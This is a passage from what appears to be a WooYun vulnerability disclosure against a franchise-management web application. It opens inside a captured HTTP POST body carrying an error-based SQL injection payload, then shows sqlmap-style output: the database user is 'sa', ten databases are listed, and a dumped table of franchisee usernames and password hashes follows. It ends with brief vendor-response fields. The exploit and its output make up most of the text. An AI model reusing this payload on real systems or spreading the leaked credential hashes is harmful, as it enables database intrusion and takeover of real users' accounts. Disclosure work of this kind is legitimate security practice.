sYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDA1JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwNSRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDYkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDA2JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwNyRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDckY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDA4JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwOCRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDkkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDA5JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxMCRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTAkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDExJGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxMiRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTIkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDEzJGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxMyRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTQkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDE0JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxNSRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTUkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDE2JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxNiRjdGwwMAVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkcmJ0bkFzY2VuZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRyYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGxiT3JkZXJpbmdZZXMFQWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyDzwrAAwBCAIDZNRevwwoPf1D21NDL2ItQdgwC9wWQV6thAlfjNxFDZE7&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtWatermarked=11'&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on&SmartRadioButtonColumn=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$gvBS_Supplier$ctl11$ctl00&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDescend&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtSupplierTypeCode=1%' AND 1606=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1606=1606) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113))) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtSupplierTypeName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtAreaFullName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtSupplierNum=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtSupplierName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=%E5%B7%B2%E5%90%AF%E7%94%A8&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
available databases [10]:
[*] master
[*] model
[*] msdb
[*] ReportServer$SQL2008
[*] ReportServer$SQL2008TempDB
[*] su8
[*] super8db
[*] super8db_2015_08_30
[*] super8dbTest
[*] tempdb
泄露大量加盟商登录信息:
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: su8
Table: ecs_users
[390 entries]
+-----------+----------------------------------+---------+---------------------------+
| user_name | password | salt | email |
+-----------+----------------------------------+---------+---------------------------+
| 1111167 | 3D9EFE0C90564204 | <blank> | [email protected] |
| 1112004 | 3FA3866567EEE174A6E4FA5D3A77AF39 | <blank> | [email protected] |
| 1112013 | 3FA3866567EEE17460B6D086D00946C4 | <blank> | [email protected] |
| 1112078 | 3FA3866567EEE17433037D3F3384ED07 | <blank> | [email protected] |
| 1112096 | 3FA3866567EEE174876630E81514FDAA | <blank> | [email protected] |
| 1112126 | 3FA3866567EEE1743D736C73EB9E40CA | <blank> | [email protected] |
| 1112137 | 3FA3866567EEE17407E73BFD0A6E0C03 | <blank> | [email protected] |
| 1112163 | 3FA3866567EEE17451F207E4F548B43D | <blank> | [email protected] |
| 1113019 | E8EEF4882CBDD119E2A145F687F03DDA | <blank> | [email protected] |
| 1113029 | E8EEF4882CBDD1192A93116981582F3D | <blank> | [email protected] |
| 1113084 | E8EEF4882CBDD1195940392EEA161ADC | <blank> | [email protected] |
| 1113092 | E8EEF4882CBDD119D8E87BE60B3D259E | <blank> | [email protected] |
| 1113094 | A2035C15DA89E31ECFD89BB49D591644 | <blank> | [email protected] |
| 1113095 | E8EEF4882CBDD119BD0ECCE91EDA7EC7 | <blank> | [email protected] |
| 1113103 | E8EEF4882CBDD119262B7E56DB8A471D | <blank> | [email protected] |
| 1113109 | E8EEF4882CBDD119D004D6FCA04DC42F | <blank> | [email protected] |
| 1113111 | E8EEF4882CBDD1195BA434AE4C64973C | <blank> | [email protected] |
| 1113116 | E8EEF4882CBDD1198FCAF61DF8C0D3E4 | <blank> | [email protected] |
| 1113120 | E8EEF4882CBDD119096CFBBCB04CE0DE | <blank> | [email protected] |
| 1113127 | E8EEF4882CBDD1196CA429AF5BB7A7C9 | <blank> | [email protected] |
| 1113137 | E8EEF4882CBDD119D837F7AA44ED516A | <blank> | [email protected] |
| 1113157 | E8EEF4882CBDD1199C482817321EBDEF | <blank> | [email protected] |
| 1113163 | E8EEF4882CBDD119B27CBF463592E54D | <blank> | [email protected] |
| 1113166 | E8EEF4882CBDD11920ED403B70466B0B | <blank> | [email protected] |
| 1113168 | E8EEF4882CBDD11977123445D6BAD269 | <blank> | [email protected] |
| 1113170 | F545BD48634228FB71D1F4414D41B603 | <blank> | [email protected] |
| 1113182 | E8EEF4882CBDD11918F8020EF1F7C9B5 | <blank> | [email protected] |
| 1113190 | E8EEF4882CBDD1197D49FA6AA8A919A5 | <blank> | [email protected] |
| 1113193 | E8EEF4882CBDD119CD2D36E361393A57 | <blank> | [email protected] |
| 1113218 | E8EEF4882CBDD1198C693A55F0F0CE64 | <blank> | [email protected] |
| 1113235 | E8EEF4882CBDD119EA409E7FFCF83F43 | <blank> | [email protected] |
| 1113236 | E8EEF4882CBDD119746BB7EAC38E8654 | <blank> | [email protected] |
| 1113237 | E8EEF4882CBDD1199357177EC6941B83 | <blank> | [email protected] |
| 1114006 | 21FBE25419A6A547355141D20509A269 | <blank> | [email protected] |
| 1114012 | 26E17FC4B7BC4381B651A1917C7F3086 | <blank> | [email protected] |
| 1114014 | 21FBE25419A6A547961B6C41F13DA277 | <blank> | [email protected]
加盟商数量:

46.png

|

修复方案:

修复

版权声明:转载请注明来源 Aug0st@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-16 01:41

厂商回复:

尽快修改

最新状态:

暂无